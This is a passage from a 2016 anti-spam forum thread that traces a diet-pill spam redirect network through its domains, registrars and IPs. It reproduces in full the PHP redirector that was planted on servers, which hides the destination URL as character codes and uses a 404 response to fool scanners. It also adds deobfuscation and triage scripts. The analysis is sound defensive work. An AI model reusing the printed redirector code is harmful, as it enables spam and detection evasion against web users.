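const SAMPLE_L4 = `function qe() { qa=3; qb=[${L4_BYTES.join(',')}]; qc=""; ` +
  'for(qd=0;qd<qb.length;qd++) { qc+=String.fromCharCode(qb[qd]-qa); } ' +
  'return qc; } setTimeout(qe(),1237);';

// Run all four layers and return the recovered plaintext of each.
function deobfuscateSamples() {
  const layer2 = unpackPacker(SAMPLE_L2.p, SAMPLE_L2.a, SAMPLE_L2.c, SAMPLE_L2.k);
  // pull the _escape literal out of the unpacked source and decode it
  const esc = /_escape='([^']*)'/.exec(layer2)[1];
  return {
    layer1: decodeReversedBase64(SAMPLE_L1),
    layer2,
    layer3: jsUnescape(esc),
    layer4: decodeOffsetArray(SAMPLE_L4),
  };
}

console.log(deobfuscateSamples());
```

Paste the real O1O literal into decodeReversedBase64(), then feed the arguments of the resulting eval(function(p,a,c,k,e,d){...})(...) call into unpackPacker(), repeating until no packer remains; the final redirect URL falls out of jsUnescape() or decodeOffsetArray() without the page ever executing.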

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 05, 2016 4:16 pm

That is an absolutely brilliant analysis of something that has been puzzling me for a long time.
I was barking up the wrong tree thinking that somehow they were usurping donations to the Save the Children fund!

I would like to add some additional information. I have detected 800 domain names used as the redirector sites. They follow a simple naming pattern. They are spread over registrars as shown in this table

REGISTRARS
Code:
241 HICHINA ZHICHENG TECHNOLOGY LTD.
102 NAUNET-RU
 79 ERANET INTERNATIONAL LIMITED
 54 BR DOMAIN INC. DBA NAMEGEAR.CO
 49 TURNCOMMERCE, INC. DBA NAMEBRIGHT.COM
 36 35 TECHNOLOGY CO., LTD
 33 ALPNAMES LIMITED
 31 CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
 24 INTERNET DOMAIN SERVICE BS CORP
 24 BIGROCK SOLUTIONS LIMITED
 19 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 19 JIANGSU BANGNING SCIENCE & TECHNOLOGY CO. LTD
 18 BIZCN.COM, INC.
...


TLDs
The TLD breakdown is
Code:
.com  380
.net 303
.ru 115


HOSTING
Most domains reside on multiple host IP addresses (3 to 6)
Code:
kloidsecse.ru has address 85.143.218.145

jbapbp.net has address 5.196.157.62
jbapbp.net has address 5.39.34.138
jbapbp.net has address 185.31.208.226

jhjrdp.com has address 188.127.231.48
jhjrdp.com has address 188.127.249.180
jhjrdp.com has address 188.225.37.17
jhjrdp.com has address 188.225.37.18

josdt.com has address 51.254.244.155
josdt.com has address 51.254.244.157
josdt.com has address 5.196.32.118
josdt.com has address 5.196.157.61
josdt.com has address 5.39.34.135
josdt.com has address 176.31.28.81


I feel it is likely from the quantity and look of the domain names that these sites are registered and installed specifically for the purpose of obfuscated redirection.

SUSPENSIONS
620 redirector sites have been suspended
180 redirector sites are still live
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 05, 2016 4:59 pm

> Previously it was save the children but today I notice it switched to "help-save-wildlife.net".

Hmm, can you recheck that?

Domain Name: HELP-SAVE-WILDLIFE.NET
Registrar: GODADDY.COM, LLC
Sponsoring Registrar IANA ID: 146
Whois Server: whois.godaddy.com
Referral URL: http://www.godaddy.com
Name Server: NS7.ROOKDNS.COM
Name Server: NS8.ROOKDNS.COM
Status: clientDeleteProhibited https://www.icann.org/epp#clientDeleteProhibited
Status: clientRenewProhibited https://www.icann.org/epp#clientRenewProhibited
Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Status: clientUpdateProhibited https://www.icann.org/epp#clientUpdateProhibited
Updated Date: 25-jan-2016
Creation Date: 25-jan-2016
Expiration Date: 25-jan-2017
..
Registrant Name: DOMAIN MAY BE FOR SALE, CHECK AFTERNIC.COM Domain Admin
Registrant Organization: Domain Registries Foundation
Registrant Street: Ramon Arias Avenue, Ropardi Building,
Registrant Street: Office 3C, PO Box 0823-03015
Registrant City: Panama City
Registrant State/Province: Panama
Registrant Postal Code: 0823
Registrant Country: PA
Registrant Phone: +507.8365439
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: admin@domainregistriesfoundation.com

The web site has a holding pattern. That may change soon, but currently it is not so impressive.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 19, 2016 11:45 pm

Hi SIL

I thought it would be possible to simply insert the domain name into the decrypted URL to go to the Safflower site.

Example, zolkm.com would become
http://404-health.zolkm.com/enkogc/everyday/r-cla-safflower-oil/

For a while that was working, but now it lands on the Save the Children site again. Has the decryption changed?

Maybe it is now using the forskolin option. Here is one that worked for me

http://479-healthandbeauty.atezt.com/enbsmd/everyday/we-pure-natural-forskolin/
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Sat Feb 20, 2016 2:39 am

These are the 3 current URLs derived from your bnoshop.com/might.php - they are selected randomly -

Code:
url=http://brfvy.com/?a=370951&c=uwl&s=03BAM
url=http://mjooex.com/?a=370951&c=uwl&s=03BAM
url=http://oxndds.com/?a=370951&c=uwl&s=03BAM


In short,
Code:
brfvy.com
mjooex.com
oxndds.com


I would appreciate any more examples like bnoshop if you see them in your spam traps.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby spamislame » Tue Feb 23, 2016 4:12 pm

Red Dwarf wrote:For a while that was working, but now it lands on the Save the Children site again. Has the decryption changed?

I'd need to see a sample. None of my sources receive this spam lately. :)

Also, to the spammer moron devs who must be reading this thread: Hi. Your obfuscation sucks.

Red Dwarf wrote:Maybe it is now using the forskolin option. Here is one that worked for me

http://479-healthandbeauty.atezt.com/enbsmd/everyday/we-pure-natural-forskolin/

Sure. They semi-randomize the prefixes to these domains. All based on a random selection of terms which are placed before the main url.

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby spamislame » Tue Feb 23, 2016 5:03 pm

Another update.

Here's what one of their php files looks like (apologies, I had to hard-wrap it to make it legible here.):

Code:
<?php
function html($data)
{
$html=implode("\r\n",array("%1html%3","%1head%3",head(),"%2head%3","%1body%3%sig
n%",body($data),"%2body%3","%2html%3"));
$html=preg_replace('/%1/',"<",$html);$html=preg_replace('/%2/',"</",$html);$html
=preg_replace('/%3/',">",$html);
$sign=parag(1,1).(strlen($html)+31331);$html=preg_replace('/%sign%/',$sign,$html
);
return $html;
}
function body($data)
{
srand(seed());
$body=array();
for($i=0;$i<rand(3,10);$i++)
{
$text=parag(50,250);
srand(seed());
$tags=array("p","div","span");$tags=$tags[rand(0,count($tags)-1)];
array_push($body,"%1$tags%3",$text,"%2$tags%3");
}
array_push($body,js($data));
return implode("\r\n",$body);
}
function head()
{
srand(seed());
$title=parag(2,10);
$charset=array("ISO-8859-1","UTF-8");$charset=$charset[rand(0,count($charset)-1)
];
$headers=array("%1style type=\"text/css\"%3\r\nbody { background:#ffffff;
color:#ffffff; }\r\n%2style%3","%1title%3$title%2title%3","%1meta
http-equiv=\"Content-Type\" content=\"text/html; charset=$charset\"%3");
srand(seed());
$rnd_num=rand(0,1);
if($rnd_num)
{
$description=parag(4,10);
$keywords=array();for($i=0;$i<rand(1,10);$i++){array_push($keywords,parag(1,1));
} $keywords=implode(", ",$keywords);
srand(seed());
$additional=array("%1meta name=\"description\"
content=\"$description\"%3","%1meta name=\"keywords\"
content=\"$keywords\"%3");$additional=$additional[rand(0,count($additional)-1)];
array_push($headers,$additional);
}
shuffle($headers);
return implode("\r\n",$headers);
}
function js($data)
{
array_unshift($data,119,105,110,100,111,119,46,116,111,112,46,108,111,99,97,116,
105,111,110,46,104,114,101,102,61,39);array_push($data,39,59);
srand(seed());$diff=rand(1,100);$name=parag(1,1);
$code="%1script type=\"text/javascript\"%3\r\n";
$code.="function ".$name."e() { ";
$code.=$name."a=$diff; ".$name."b=[";
$list=array();foreach($data as $byte){array_push($list,($byte+$diff));}
$code.=implode(',',$list);
$code.="]; ";
$code.=$name."c=\"\"; for(";
$code.=$name."d=0;".$name."d<".$name."b.length;".$name."d++) { ";
$code.=$name."c+=String.fromCharCode(".$name."b[".$name."d]-".$name."a); }
return ";
$code.=$name."c; } ";
$diff+=1234;$code.="setTimeout(".$name."e(),$diff);\r\n";
$code.="%2script%3";
return $code;
}
function parag($min,$max)
{
// Builds a random "paragraph" from the word list below. The same list is
// used throughout the generated file to name the JavaScript parameters.
srand(seed());
$parag="";
$words=array(
"theres","such","a","place","as","yarrow","thou","whose","fancies","from",
"afar","are","brought","little","flowerill","make","stir","when","all","alive",
"with","merry","chimes","has","it","in","her","power","again","and",
"fortune","gifts","lies","garland","of","seven","lilies","wrought","should","life",
"be","dull","spirits","low","that","they","wanton","wooers","but","we",
"will","leave","growing","years","to","mother","bring","distress","prophet","delight",
"mirth","inhale","deeply","right","until","level","the","dust","noble","horde",
"preserve","for","thee","by","individual","water","you","can","start","he",
"was","free","write","on","snow","yet","left","conquered","mountain","peaks",
"this","is","calm","there","cannot","stayed","pushkin","never","tried","flee",
"together","plungd","into","deep","legs","move","not","if","set","signboard",
"blaze","weakstraight","grave","well","wander","scotland","thorough","strikes","solitary","sound",
"what","evil","spirit","deception","my","opponent","played","knows","guess","just",
"lapped","icecold","milky","way","killing","i","have","made","myself","perhaps",
"quick","eager","visitings","nor","quit","thy","shore","conspicuous","object","nations",
"eye","watched","me","rise","awe","neighborlowlifes","shared","while","pattern","knights",
"dance","under","jedborough","tower","screams","weak","allow","pass","cheers","melancholy",
"mate","let","beeves","homebred","kine","partake","twas","face","did","know",
"stood","against","were","sieving","grain","ossian","last","his","race","telling",
"now","worldly","grandeur","despise","woman","road","met","one","chance","look",
"turn","taken","praise","thine","any","burden","soul","pain","keep","squatting",
"till","drop","darling","passion","approve","slipped","cliff","better","memory","punish",
"him","constant","checking","selfsacrifice","cover","leaves","children","forlorn","estate","maytime",
"chearful","dawn","queen","greater","than","rest","recollect","doomd","jostle","unkindly",
"shocks","squares","more","like","circles","eyes","sea","grief","splashing","diffusion",
"crown","win","stirring","brake","fern","time","before","thrush","ever","deeds",
"give","birth","bay","quiet","or","unthoughtof","obscurity","sad","sight","shepherd",
"sigh","shake","flowing","rivers","would","hide","she","wait","return","pity",
"whom","must","follow","head","fall","starting","duel","so","inane","brothers",
"reachd","gateway","who","art","light","guide","rod","something","deeper","far",
"these","neither","shape","danger","dismay","lanes","thoughts","pursuing","good","men",
"do","sate","denial","restraint","prize","how","nourishd","here","through","long",
"ground","thankfulness","halts","searches","smitten","heart","god","only","known","some",
"might","say","run","cry","nay","us","die","oh","strong","forceful",
"echo","voice","enwrought","tempted","able","endure","speak","horn","shall","witness",
"pasture","expending","vegetarian","love","sweet","highland","girl","part","an","indian",
"approach","every","angle","sought","moral","creed","deaf","drooping","doom","hangover",
"quickening","thence","also","tenderness","influence","peculiar","grace","risen","out","many",
"nownow","along","gap","where","edge","very","narrow","been","then","thought",
"joy","wants","eatand","eat","beg","please","your","quite","advanced","died",
"cabin","small","betwixt","living","dead","oer","lauras","over","hill","hollow",
"evolve","havoc","disease","risk","land","sped","horse","away","wounded","game",
"workman","worthy","sainted","bold","hubert","lives","glee","scramble","cities","crowded",
"streets","apprehensions","come","crowds","dweller","savage","ends","maintain","rights","those",
"rules","saw","upon","nearer","view","said","beneath","cloak","separation","music",
"bore","beautiful","verses","their","honor","penned","ages","heirs","value","masters",
"side","murmur","near","silent","lake","yarrows","banks","herons","feed","towards",
"people","era","grew","colder","night","day","at","even","morn","brain",
"wisdom","greedy","spider","flower","mine","check","erring","reprove","alas","received",
"cheerless","murky","space","depleting","gloomily","gleaming","harking","talking","man","arms",
"wish","thing","unreconciled","pious","bird","scarlet","breast","bluecap","colours","bright",
"ye","thoughtless","pair","old","unhappy","faroff","things","above","human","estimate",
"crawling","lurking","concealing","others","spilled","blood","moment","stay","brink","paris",
"france","disapproved","sharing","see","hamiltons","ballad","took","jacket","off","effect",
"no","babe","proposed","castle","trade","board","prove","best","heights","boughs",
"them","closing","commandment","kill","vain","causeless","led","lucy","spot","continued",
"rue","posterngate","slunk","sun","shade","annoying","crickets","voluptuously","luscious","gods",
"appointment","sway","heave","after","our","first","green","pastures","remain","which",
"nothing","sweeter","heard","hungered","fame","accused","gaiety","courageous","shows","its",
"hunting","sinful","demand","roaring","yelling","peace","disturbing","contracted","own","hurried",
"ran","called","though","past","prime","feeling","renderd","compassionate","grip","pistol",
"hand","go","spots","bough","grassy","blade","sweat","tenseness","wedding","down",
"rocks","leap","plaintive","numbers","flow","lost","weight","slept","fine","gradually",
"vanishing","century","lasting","slowly","passed","strike","take","aim","famous","robin",
"hood","indeed","claim","principles","amen","poor","yurik","steph","empty","terrors",
"overawe","sweets","burnmill","meadow","convent","hermits","cell","wooden","castles","rooks",
"bar","closed","months","went","smilingly","repeats","moan","moss","stone","incapable",
"vengeance","refuse","lineswithout","doubt","poet","play","awesome","appetite","works","three",
"four","smiles","motion","sky","serene","pure","almost","could","repine","hadst",
"boast","didst","foot","had","useless","trunk","various","poems","scene","laid",
"buds","taught","piece","route","falsely","correctly","single","passd","sir","eustace",
"present","does","bard","sleep","dilemma","appeared","warn","comfort","command","countless",
"warriors","pale","trembling","denmark","cast","exceeding","pleasure","among","farthest","hebrides",
"spite","reason","thoughtful","herdsman","strays","stately","passions","burn","fought","lucies",
"fair","hangs","apple","frae","rock","second","twilight","looks","gay","although",
"wild","moor","wood","fairest","creatures","desire","increase","wind","threw","words",
"pleasance","transports","advantage","jab","playmates","sunny","weather","swap","each","figure",
"liquor","glass","why","am","ignorant","same","awaking","sleeping","marching","parading",
"most","important","true","solitude","binnorie","lie","about","feet","moving","back",
"forth","hath","family","outlaw","daring","mood","egremonts","domains","death","emerges",
"done","worldlings","unmovd","mind","lanetheres","morning","rub","yourself","harder","two",
"simple","phrases","unfinished","scenes","need","child","eddying","round","sink","flew",
"during","term","hear","neglect","lower","world","descending","bravery","times","conclusion",
"drawn","raw","wet","stirs","doors","brother","seems","singingbird","gone","picture",
"wellspent","seemd","paltry","indopakistani","struggle","highranking","adolescents","worse","ourselves","walk",
"started","perceive","duller","none","tracks","motions","slow","knowing","think","lofty",
"woke","forgive","tough","become","favour","sounded","alone","enormous","barrier","binds",
"fast","find","longs","get","trapped","fishermen","net","large","droplets","flowers",
"laugh","beds","higher","hast","summoned","melt","pointed","lance","travel","hours",
"perfect","gladsomeness","rage","rush","around","house","pother","young","lambs","fullgrown",
"flocks","beside","heathy","dell","close","behind","frosty","air","fishers","sisters",
"johnny","warned","watch","foresee","moves","surely","surrender","quality","act","tales",
"whybecause","rule","steep","up","kind","chaunt","passing","stave","capable","rate",
"strange","slight","scorn","fear","clear","weeds","law","depends","port","plane",
"april","still","asking","deceitful","solution","chime","fancy","wrong","trod","clyde",
"tay","skies","stream","flows","bonny","holms","maimd","mangled","inhuman","often",
"sighd","measure","summers","heat","winters","traveller","whole","summer","fields","peers",
"whats","arm","bear","vision","sovereign","enact","winsome","marrow","tell","everything",
"closer","fellowship","count","glittering","countenance","moved","expressd","lines","yes","endless",
"problem","answer","seemed","strife","despair","glorious","ministry","thats","moon","choice",
"blurry","meat","bullets","easy","chewable","food","comprehends","trust","remnant","uneasy",
"crystal","flakes","brilliant","glow","wave","fare","talented","hymns","sings","springtime",
"cuckoobird","oft","nooks","remote","brave","rob","roy","impossible","doth","won",
"found","hopeless","honour","gain","creature","lord","friend","tackle","becoming","irate",
"gentle","nature","guard","ill","flaring","unusual","primroses","glory","branches","quietly",
"squealing","joyous","other","stuff","age","twine","brows","fresh","spring","brings",
"decay","hell","else","bawling","raving","signing","flirting","july","suns","feels",
"games","giddy","sprite","darkness","pleasd","equal","lay","sights","rough","sounds",
"rains","comes","sparkle","cheek","agile","neat","pansies","kingcups","daisies","desperately",
"try","shot","caught","utmost","bounty","kindle","fire","new","stirrd","too",
"sedate","outward","show","kings","aces","disguise","lonely","deem","unmeet","news",
"sleeps","glen","without","someone","attacked","pretty","kitten","freaks","leaf","glowworm",
"quickly","may","float","double","swan","shadow","daunted","father","recompence","catch",
"lips","mazy","unravelld","really","roam","abides","resolve","stops","lookd","wanting",
"once","fish","raves","thus","daily","selfsurpast","going","hence","livst","less",
"ambitious","sprint","fly","crags","repeat","ravens","croak","bliss","number","funny",
"droll","repeating","timid","coming","whence","kindly","unassuming","cheer","wings","arch",
"wily","ways","lead","generous","books","course","call","household","fitted","needs",
"lovely","apparition","sent","hook","jaw","early","breath","tigerleap","half","late",
"conceived","proper","curse","lacked","fully","methods","attack","mad","throughout","conflict",
"keeps","forward","persevering","gallop","horses","peaceful","bed","because","museand","agree",
"shoved","unwelcome","tasks","word","fulfilld","singing","hearts","insane","happened","surgeon",
"cut","across","thither","rainbow","cloud","figurethere","year","dost","confession","askd",
"forgiveness","fellow","feats","vainly","spreads","lure","inheritest","lions","den","endurance",
"foresight","strength","skill","hid","care","thousand","standersby","evermore","beguild","whether",
"blows","western","bound","himself","unbound","ownd","precipice","front","begin","fro",
"hurry","fight","rover","suddenly","agreed","draw","shone","tree","observed","blunder",
"enough","earth","heaven","imagery","lowlier","gains","rewards","privileges","loch","ketterine",
"evening","sunset","mien","blending","pawn","standing","proud","country","bred","adopt",
"homely","dress","within","bud","buriest","content","glitters","plain","pinfoldlike","burialgrounds",
"neglected","desolate","showers","manna","breaking","defense","told","simply","fidelity","dog",
"hovering","nigh","hospitably","entertained","weeks","dismal","guarding","protecting","meet","pleasant",
"build","sides","wishes","carst","naught","longest","appetizer","use","bottle","sign",
"fallen","faculties","english","balladsingers","transient","sorrows","wiles","tender","heir","flight",
"surrounded","ancient","heavens","writing","rhymes","england","hawk","prey","maiden","dwelling",
"yon","lass","yelping","runs","symphony","austere","hed","today","disgrace","unwind",
"drink","sing","blast","utterd","unskillfulness","aid","aside","smoke","image","outlined",
"hang","rememberd","blest","got","fastidious","coronet","riding","home","stormy","louisa",
"lets","bad","receives","fiercely","hunters","line","lightweight","bishops","feeble","forms",
"covert","peep","travellers","shady","haunt","askest","stared","blink","came","clovenford",
"few","meagre","vales","confind","joys","spy","bosom","helvellyn","rocky","supplicate",
"controul","travelld","unknown","exposd","suffering","furnishes","suspended","defeat","hanging","tail",
"step","frost","shew","help","frame","listen","tight","thong","later","learned",
"panic","winds","brook","sits","vacant","shots","being","fired","aims","grass",
"forgivn","guards","feel","restless","loudly","grunting","running","painted","robins","breathed",
"burthen","fashiond","dream","knew","matron","due","blasts","wit","towel","spotted",
"fruit","unripe","industrious","folly","patient","primrose","fault","dusk","ive","seldom",
"markd","press","likewise","sons","daughters","dig","inside","plate","throat","walked",
"throne","deserved","missing","link","glides","dark","hills","nest","cried","loves",
"friends","trim","hues","filld","tears","whateer","enjoyments","dwell","ripening","innocence",
"example","gave","looking","snack","records","promises","submit","bowers","playd","gambol",
"lifes","falling","state","youth","pathway","cultivated","heaved","holding","lover","craved",
"quell","foes","unfolding","wide","earthly","cares","asleep","pyramid","celandine","bag",
"lose","shout","whistle","ear","bitterness","quietness","thickets","fifty","greetings","stirringly",
"swimming","walking","repose","twice","consenting","shed","glance","eagerness","chasing","mice",
"health","body","pind","theme","sung","another","grizzly","speech","bit","makes",
"decoy","chased","harnesses","high","darts","blame","wildest","scream","ah","already",
"spent","pride","gazed","conveyd","wealthy","treasure","dread","rustling","utterly","guise",
"kept","voyages","delights","mournful","tale","keen","white","great","issues","humankind",
"spare","conflicts","fate","unaware","astronomer","break","silence","throw","needful","knight",
"verse","steerd","proclamationhorn","mock","apparel","son","humbled","sit","walls","truth",
"seem","answerd","soon","question","appearance","meets","sang","battles","soccer","player",
"tarn","below","wrongs","scarcely","heed","blocked","lane","faery","voyager","both",
"wise","crush","rival","howsoever","mean","derived","search","starsigntaurus","grasped","immobility",
"lithest","gaudiest","harlequin","kisses","touch","sip","separating","opposing","notion","proved",
"booze","coffee","charms","seas","thread","ariadne","scheme","chef","convinced","scared",
"steps","virgin","liberty","days","following","husband","govern","record","honest","continuing",
"imprisond","hot","sunshine","inheritance","twilights","dusky","hair","whatsoeer","sunbright","full",
"childish","liveth","despaird","believd","remains","wearily","length","flaw","unknowingly","missed",
"stirrups","disciplined","wicked","sickle","bending","stop","matter","learn","history","bleak",
"mild","concerns","ordinary","winter","wears","proof","roys","alert","planned","plotted",
"fierce","row","dauntless","challenge","ask","apply","beauty","dower","woe","lintwhites",
"chorus","fellowtraveller","cold","ice","worlds","flu","illnessthree","region","lucky","bastard",
"twill","soothe","sorrow","polity","sacrifice","christ","saviour","sticking","kerchiefplots","mold",
"name","river","bare","wanderers","thousands","dollars","effortless","money","fatherly","concern",
"pang","vexd","aver","multitude","sweetly","reposing","bands","armsout","trees","veil",
"withdrawn","hut","tour","confuse","debut","godheads","benignant","andmoney","needed","ride",
"barking","cat","plays","neatly","error","unprofitable","ophilia","dear","delighted","sake",
"replaced","athletic","prophy","guessing","tundra","peter","norway","boors","prison","clinicmy",
"seemliness","complete","sways","seen","tiviot","dale","familiar","provokes","lady","shares",
"wonder","merits","resolved","eer","champion","brotherhood","venerable","damn","fawns","extacy",
"buttercups","unheard","cull","faculty","storm","turbulence","happy","genial","barely","cool",
"diffuse","blessd","main","embarrassd","shy","next","sense","persons","advance","hamilton",
"beginning","shield","latest","impearling","lucie","born","figures","braes","humbly","bloodshed",
"miserable","train","courtesies","wilt","panting","violets","acted","tidings","woes","end",
"stars","hungry","surprised","tells","clamor","stopped","dries","used","severe","since",
"untowardness","poets","mere","mostly","rooted","chair","livd","lands","soothed","milder",
"airs","stranger","seemingly","civil","harmless","stand","straight","nervous","daisy","blessed",
"rising","collapse","reaping","herself","remember","amazing","palms","infants","laughing","puzzled",
"blinded","immediately","leaps","feeding","appletree","superstition","worth","taking","sympathy","heeds",
"trace","upstarting","affright","greetst","fowls","ref","hadn","opened","score","nobody",
"posterity","renownd","unexciting","vice","guests","listend","fill","reaper","bushes","mournfully",
"eggs","gaze","places","hurrythree","flourish","seeking","school","scannd","dewdrop","unto",
"lowly","pursue","pox","turns","necessity","beloved","possess","grotto","particular","exquisite",
"baby","chains","tie","befal","yellow","rouzd","vale","holiday","flutterd","perchd",
"thank","mechanic","whip","lash","striking","force","applying","muscles","shaped","wake",
"highlands","troubles","beyond","relief","untimely","joyousness","hideandseek","homefelt","pleasures","itself",
"common","breeds","liked","greeting","mountains","eagle","seventythree","nighttime","short","hither",
"straightway","behold","seehis","fork","begins","rattle","boat","graven","read","fathers",
"courtesy","runaway","beautifully","outstandingly","clever","prettiest","tumbler","infant");
if($min==1)
{
// A single random word (used for identifiers)
return $words[array_rand($words)];
}
else
{
// Pick between $min and $max random words, append random punctuation to
// about half of them, and capitalise the word after a full stop or colon.
$words_idx=array_rand($words,rand($min,$max));
$first_upc=1;
$parag=array();
foreach($words_idx as $idx)
{
$word=$words[$idx];
$rnd_num=rand(0,1);
$sym="";
if($rnd_num)
{
$rnd_sym=array(","," -",":",".");
$rnd_num=rand(0,count($rnd_sym)-1);
$sym=$rnd_sym[$rnd_num];
$word.=$sym;
}
if($first_upc)
{
array_push($parag,ucfirst($word));
$first_upc=0;
}
else
{
array_push($parag,$word);
}
if($sym=="." || $sym==":") $first_upc=1;
}
array_push($parag,$words[array_rand($words)]);
}
return implode(" ",$parag).".";
}
function seed()
{
// Seed derived from the current microtime
list($usec,$sec)=explode(' ',microtime());
return(float)$sec+((float)$usec*100000);
}
// Send a 404 status first, then emit the redirect page for the URL whose
// character codes are listed in the array.
header("HTTP/1.1 404 Not Found");echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,114,117,103,115,118,97,108,117,101,46,114,117)));
?>


That last bit is the payload:

Code: Select all
echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,114,117,103,115,118,97,108,117,101,46,114,117)));


Really they put all of that code in there to completely randomize the output. That array of single words is used throughout. Every parameter used by the resulting javascript derives its name from that random word list. But that final line is really just the "charcode" values of the target url.

104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,114,117,103,115,118,97,108,117,101,46,114,117

Translated to:

http://perfectdrugsvalue.ru

The files are placed on the server via automated means, so whichever process is doing this does so with a seeded final destination url that it turns into these charcodes, and then generates this php file. Every php file has its own custom set of random words.

Also note the 404 response just prior to output:

Code: Select all
header("HTTP/1.1 404 Not Found");echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,114,117,103,115,118,97,108,117,101,46,114,117)));

What that's saying is:

By default, output a 404 not found response, and then run the "html" function feeding it the charcodes of the destination url.

If you try to wget or curl the url: you get the 404. Same for any other means of deriving the url via alternate methods besides direct browsing. Otherwise it ultimately outputs a redirect to the target url.

SiL
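Decoding the payload line described in the post above, as an added example (Python, not code from the post or from the spam kit): it pulls every html(array(...)) call out of a dropped PHP file, turns the character codes back into the destination URL, and flags the 404 cloak that the post explains precedes the redirect. The regexes are tolerant of line-wrapping, so a file pasted from a forum code box (as here) decodes the same as the original. The SAMPLE_PHP text is constructed for the example; the charcode list in it is the one quoted in the post.

```python
"""Triage helper for charcode-obfuscated PHP redirectors (added example)."""
import re

# html(array(104,116,...)) with any amount of whitespace/newlines between codes
PAYLOAD_RE = re.compile(
    r"html\s*\(\s*array\s*\(\s*([\d,\s]+?)\s*\)\s*\)", re.IGNORECASE)

# header("HTTP/1.1 404 Not Found") -- \s+ between the words so a string literal
# split by forum/extraction wrapping still matches
CLOAK_RE = re.compile(
    r'header\s*\(\s*"HTTP/1\.[01]\s+404\s+Not\s+Found"\s*\)', re.IGNORECASE)


def decode_charcodes(codes):
    """Turn a list of integer character codes into the string they spell."""
    return "".join(chr(c) for c in codes)


def extract_destinations(php_source):
    """Return every URL hidden in html(array(...)) calls, in file order."""
    found = []
    for m in PAYLOAD_RE.finditer(php_source):
        # int() tolerates the surrounding whitespace left by wrapped lines
        codes = [int(tok) for tok in m.group(1).split(",") if tok.strip()]
        if codes:
            found.append(decode_charcodes(codes))
    return found


def has_404_cloak(php_source):
    """True if a 404 status is sent before the first redirect payload."""
    cloak = CLOAK_RE.search(php_source)
    payload = PAYLOAD_RE.search(php_source)
    return bool(cloak and payload and cloak.start() < payload.start())


def triage(php_source):
    """Summarise one dropped file: is it cloaked, and where does it send people."""
    return {
        "cloaked": has_404_cloak(php_source),
        "destinations": extract_destinations(php_source),
    }


# Constructed sample: the tail of a dropper as the forum displayed it, with the
# header() string literal wrapped across two lines.
SAMPLE_PHP = '''...
header("HTTP/1.1 404 Not
Found");echo(html(array(104,116,116,112,58,47,47,112,101,114,102,101,99,116,100,
114,117,103,115,118,97,108,117,101,46,114,117)));
?>'''

if __name__ == "__main__":
    print(triage(SAMPLE_PHP))
```

Run it against a real dropped file with triage(open(path).read()); a result with cloaked True and a non-empty destinations list is the pattern the post describes, and the decoded hostnames are what to report.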

Re: Save The Children = Safflower Oil Spammers in stealth mode

Postby Red Dwarf » Wed Feb 24, 2016 5:25 pm

Red Dwarf wrote:These are the 3 current URLS derived from your bnoshop.com/might.php - they are selected randomly -

Code: Select all
url=http://brfvy.com/?a=370951&c=uwl&s=03BAM
url=http://mjooex.com/?a=370951&c=uwl&s=03BAM
url=http://oxndds.com/?a=370951&c=uwl&s=03BAM


In short,
Code: Select all
brfvy.com
mjooex.com
oxndds.com


I would appreciate any more examples like bnoshop if you see them in your spam traps.


Those domain names have been abandoned and replaced with
Code: Select all
http://rpfxf.com/?a=370951&c=uwl&s=03BAM
http://oisrii.com/?a=370951&c=uwl&s=03BAM
http://tyikl.com/?a=370951&c=uwl&s=03BAM


In short:
Code: Select all
rpfxf.com
tyikl.com
oisrii.com


Sponsors:
Code: Select all
 rpfxf.com   Registrar: BIZCN.COM, INC.
 tyikl.com   Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 oisrii.com   Registrar: ONLINENIC, INC.

Re: Save The Children = Safflower Oil Spammers in stealth mode

Postby Red Dwarf » Thu Feb 25, 2016 9:48 pm

New skin, same fraud, Forskolin today:

Code: Select all
uskldl.com
xybdyj.com
bbikiy.com


Sponsors are OnlineNIC, BIZCN, BIZCN respectively

Featuring: Gwen Stefani Shares Blake Shelton's Secret To Rapid Weight Loss (Pics Below)

Typical URL derived:
360-fitness.uskldl.com/enumbr/tmz/we-pure-natural-forskolin/

Re: Save The Children = Safflower Oil Spammers in stealth mode

Postby Red Dwarf » Fri Mar 18, 2016 7:22 pm

Is there a new redirection format that is working, or is the whole Safflower / Forskolin scam on the fry?

I am wondering if the gateway error is just a subterfuge, and somewhere out there a new redirection process is working undetected by me.

(They still get shut down, working or not.)

Re: Save The Children = Safflower Oil Spammers in stealth mode

Postby spamislame » Mon Apr 04, 2016 10:22 am

Howdy

I do not know. If you receive fresh spam containing such a url please pm me the url and I'll do some more digging.

They're definitely staying far away from me. :)

SiL